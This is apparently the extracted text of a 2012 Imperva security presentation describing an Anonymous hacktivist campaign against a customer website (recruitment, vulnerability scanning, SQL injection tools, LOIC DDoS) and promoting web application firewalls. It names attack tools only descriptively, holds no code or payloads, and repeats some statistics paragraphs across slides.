The Anatomy and Security of an Anonymous Operation July 2012 Terry Ray – VP WW Security Engineering
What is Anonymous? Reality Perception “[Anonymous is] the first Internet-based superconsciousness.” —Chris Landers. Baltimore City Paper, April 2, 2008 Hacktivists fighting for moral causes. The 99%. Reality “Anonymous is an umbrella for anyone to hack anything for any reason.” —New York Times, 27 Feb 2012 Targets include porn sites, Mexican drug lords, Sony, government agencies, banks, churches, law enforcement and Vladimir Putin. Anyone can be a target.
The Plot Attack took place in 2011 over a 25 day period. Anonymous was on a deadline to breach and disrupt a website, a proactive attempt at hacktivism. 10-15 skilled hackers. Several hundred to thousands supporters.
How They Attack: The Anonymous Attack Anatomy
Anonymous Attack on Customer Site Web Application Protection Use Case SecureSphere Web Application Firewall Presentation Anonymous Attack on Customer Site Web Application Protection Use Case May 21, 2007 PHASE I SecureSphere stopped all phases of attack Technical Attack Scanners such as Nikto Phase III PHASE II Business Logic Attack The first use case we are going to look at is Web application protection and since it is an important use case, we are going to examine different Web application threats and how SecureSphere mitigated them. The first one is a multinational company that was attacked by the hacktivist group Anonymous. Imperva witnessed the assault which occurred over a period of 25 days. It started with recruiting activities and application probes by scanners such as Nikto and Acunetix. These scans tried to uncover Web vulnerabilities. During the second phase, Anonymous turned to attack tools like the Havij SQL injection tool to attempt to hack the site. They also used anonymity services like anonymous proxies to disguise their identity. During both of these phases, Imperva blocked all attacks. When the technical attacks failed, Anonymous turned to DDoS attacks to attempt to bring down the Website. They used LOIC, or Low Orbit Ion Cannon, and a new mobile version of the attack tool to disrupt application access. Traffic spiked, but SecureSphere was able to mitigate this Web-based DDoS attack. Technical Attack Havij SQL injection tool LOIC application Imperva
On the Offense Skilled hackers—This group, around 10 to 15 individuals per campaign, have genuine hacking experience and are quite savvy. Broad use of anonymizing services (aProxy & TOR). Nontechnical—This group can be quite large, ranging from a few dozen to a few hundred volunteers. Directed by the skilled hackers, their role is primarily to conduct DDoS attacks by either downloading and using special software or visiting websites designed to flood victims with excessive traffic.
On the Defense Deployment line was network firewall, IDS, WAF, web servers, network anti-DOS and anti-virus. Imperva WAF SecureSphere WAF version 8.5 inline, high availability ThreatRadar reputation (IP Reputation) SSL wasn’t used, the whole website was in HTTP
1 Recruiting and Communications
Step 1A: An “Inspirational” Video
Step 1B: Social Media Helps Recruit
Setting Up An Early Warning System
Example
2 Recon and Application Attack “Avoid strength, attack weakness: Striking where the enemy is most vulnerable.” —Sun Tzu
Step 1A: Finding Vulnerabilities Tool #1: Vulnerability Scanners Purpose: Rapidly find application vulnerabilities. Cost: $0-$1000 per license. The specific tools: Acunetix (named a “Visionary” in a Gartner 2011 MQ) Nikto (open source)
Hacking Tools Tool #2: Havij Purpose: Developed in Iran Automated SQL injection and data harvesting tool. Solely developed to take data transacted by applications Developed in Iran
Vulnerabilities of Interest DT SQLi XSS
Comparing to Lulzsec Activity Lulzsec was/is a team of hackers focused on breaking applications and databases. ‘New’ Lulzsec taking credit for recent attacks. Militarysingles.com. Our observations have a striking similarity to the attacks employed by Lulzsec during their campaign. Lulzsec used: SQL Injection, Cross-site Scripting and Remote File Inclusion (RFI/LFI). RFI index.php Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.
Lulzsec Activity Samples 1 infected server ≈ 3000 bot infected PC power 8000 infected servers ≈ 24 million bot infected PC power Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.
Automation is Prevailing In one hacker forum, it was boasted that one hacker had found 5012 websites vulnerable to SQLi through automation tools. Note: Due to automation, hackers can be effective in small groups – i.e. Lulzsec. Automation also means that attacks are equal opportunity offenders. They don’t discriminate between well-known and unknown sites. Most notably, the ADC found that attack automation is prevailing. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. As the recent Lulzsec episode highlighted, hackers can be effective in small groups. Further, automation also means that attacks are equal opportunity offenders; they do not discriminate between well-known and unknown sites or enterprise-level and non-profit organizations. Automation is prevailing. According to the study, websites experience an average of 27 attacks per hour or about once every two minutes. However, 27 attacks per hour is only an average. When sites come under automated attack, the target can experience up to 25,000 attacks per hour or 7 per second.
US is the ‘visible’ source of most attacks Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT. During the Anonymous attack 74% of the technical attack traffic originated from anonymizing services and was detected by IP reputation.
Stop Automated Attacks Mitigation: AppSec 101 Code Fixing Dork Yourself Blacklist + IP Rep WAF WAF + VA Stop Automated Attacks
3 Application DDoS
LOIC Facts Low-Orbit Ion Canon (LOIC) Purpose: DDoS Mobile and Javascript variations Other variations – HOIC, GOIC, RefRef LOIC downloads 2011: 381,976 2012 (through May 10): 374,340 June 2012= ~98% of 2011’s downloads!
Anonymous and LOIC in Action Transactions per Second LOIC in Action Average Site Traffic
Application DDoS The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit. —The Hacker News, July 30, 2011
But That Much Sophistication Isn’t Always Required
But That Much Sophistication Isn’t Always Required Meet your target URL
4 Non-Mitigations
I have IPS and NGFW, am I safe? IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. WAFs at a minimum must include the following to protect web applications: Web-App Profile Web-App Signatures Web-App Protocol Security Web-App DDOS Security Web-App Cookie Protection Anonymous Proxy/TOR IP Security HTTPS (SSL) visibility Security Policy Correlation
I have IPS and NGFW, am I safe? IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. However, IPS and NGFWs at best only partially support the items in Red: Web-App Profile Web-App Signatures Web-App Protocol Security Web-App DDOS Security Web-App Cookie Protection Anonymous Proxy/TOR IP Security HTTPS (SSL) visibility Security Policy Correlation
Recent attacker targets…. Yahoo Voice Linked In Last.fm Formspring eHarmony US Department of Justice US Copyright Office FBI MPAA Warner Brothers RIAA HADOPI BMI SOHH Office of the AU Prime Minister AU House of Parliament AU Department of Communications Swiss bank PostFinance Egyptian Government Itau Banco de Brazil US Senate Caixa Church of Scientology Muslim Brotherhood Zappos.com MilitarySingles.com Amazon Austria Federal Chancellor HBGary Federal Mexican Interior Ministry Mexican Senate Mexican Chamber of Deputies Irish Department of Justice Irish Department of Finance Greek Department of Justice Egyptian National Democratic Party Spanish Police Orlando Chamber of Commerce Catholic Diocese of Orlando Bay Area Rapid Transit PayPal Mastercard Visa How many of these organizations have AV, IPS and Next Generations Firewalls? Why are the attacks successful when these technologies claim to prevent them?
5 Demo